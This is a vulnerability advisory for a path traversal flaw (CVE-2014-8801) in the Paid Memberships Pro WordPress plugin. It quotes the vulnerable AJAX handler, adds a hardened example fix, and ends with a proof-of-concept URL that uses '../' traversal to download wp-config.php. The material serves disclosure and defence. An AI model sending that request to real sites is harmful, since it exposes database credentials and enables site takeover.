Paid Memberships Pro 1.7.14.2 Path Traversal

Homepage:

https://wordpress.org/plugins/paid-memberships-pro/

CVE-ID

CVE-2014-8801

CVSS Score

7.8

CVSS Vector

(AV:N/AC:L/Au:N/C:C/I:N/A:N)

Description:

getfile.php is accessible to everyone.

File: paid-memberships-pro\includes\services.php

add_action('wp_ajax_nopriv_getfile', 'pmpro_wp_ajax_getfile');
function pmpro_wp_ajax_getfile()
{
	require_once(dirname(__FILE__) . "/../services/getfile.php");
	exit;
}

The is_admin() function is used to check privileges, but because this code runs in the context of wp-admin/admin-ajax.php, is_admin() always evaluates to true (it only reports that the request targets an admin URL, not that the user has any capability).

So we can download any file.
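As an added illustration (not code from the plugin or from the advisory author), the handler below shows the two checks the vulnerable path lacks: an explicit capability check in place of is_admin(), which is always true under wp-admin/admin-ajax.php, and canonicalisation of the requested path so that it cannot resolve outside the directory the plugin intends to serve from. The served directory (uploads/pmpro-files), the "file" query parameter, the manage_options capability and the pmpro_example_ function names are assumptions; the WordPress functions used (current_user_can, wp_upload_dir, wp_unslash, wp_send_json_error) are standard core API.

```php
<?php
// Added example, not the plugin's code. Assumptions: files are served from
// an "uploads/pmpro-files" directory, the request names the file in a "file"
// parameter, and access requires the "manage_options" capability.

/**
 * Resolve $requested relative to $base_dir and return the canonical absolute
 * path, or null if the file does not exist or resolves outside $base_dir.
 */
function pmpro_example_resolve_file($base_dir, $requested)
{
    $base = realpath($base_dir);
    if ($base === false) {
        return null; // base directory missing
    }
    // realpath() collapses "..", symlinks and duplicate separators, so the
    // prefix comparison below is made on the canonical path, not the raw input.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false) {
        return null; // file does not exist
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside the allowed directory
    }
    return $target;
}

function pmpro_example_wp_ajax_getfile()
{
    // is_admin() only says the request targets an admin URL, which every
    // admin-ajax.php request does; check an actual capability instead.
    if (!is_user_logged_in() || !current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403); // calls die() internally
    }

    $requested = isset($_GET['file']) ? wp_unslash($_GET['file']) : '';
    $upload    = wp_upload_dir();
    $path      = pmpro_example_resolve_file($upload['basedir'] . '/pmpro-files', $requested);
    if ($path === null) {
        wp_send_json_error('not found', 404);
    }

    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    readfile($path);
    exit;
}

// Registered for authenticated users only; no wp_ajax_nopriv_ hook is added,
// so unauthenticated requests to admin-ajax.php never reach the handler.
add_action('wp_ajax_getfile', 'pmpro_example_wp_ajax_getfile');
```

The prefix check is done after realpath() on both sides so that sequences such as "../" or a symlink inside the served directory cannot move the resolved path outside it; checking the raw string for ".." would miss the symlink case. Dropping the wp_ajax_nopriv_ registration is what removes the unauthenticated route entirely.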

Proof of Concept:

http://wordpress-url/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php

Timeline: